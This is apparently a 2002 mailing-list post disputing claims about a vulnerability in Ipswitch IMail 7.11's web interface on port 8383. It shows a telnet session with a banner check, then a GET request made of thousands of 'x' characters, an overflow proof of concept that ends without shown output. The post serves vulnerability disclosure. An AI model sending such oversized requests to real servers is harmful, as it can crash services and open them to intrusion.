uh, ok first of all, I haven't been able to respond to any mail since Saturday afternoon as some nice person/vendor filed a phony abuse report with the intelligent people of Yahoo Inc., and had my account suspended and banned.. if you sent any email since Saturday, please resend it here.. I'm sure I'll have a week or so to read it before I am ABUSE REPORT H4XED..
first off, maybe the exploit isn't working on your system.. hmm, possible I guess?.. the described situation is still quite repeatable so what the hell:

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143
[....]

hmm, looks like IMail 7.11 to me? how about you?

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx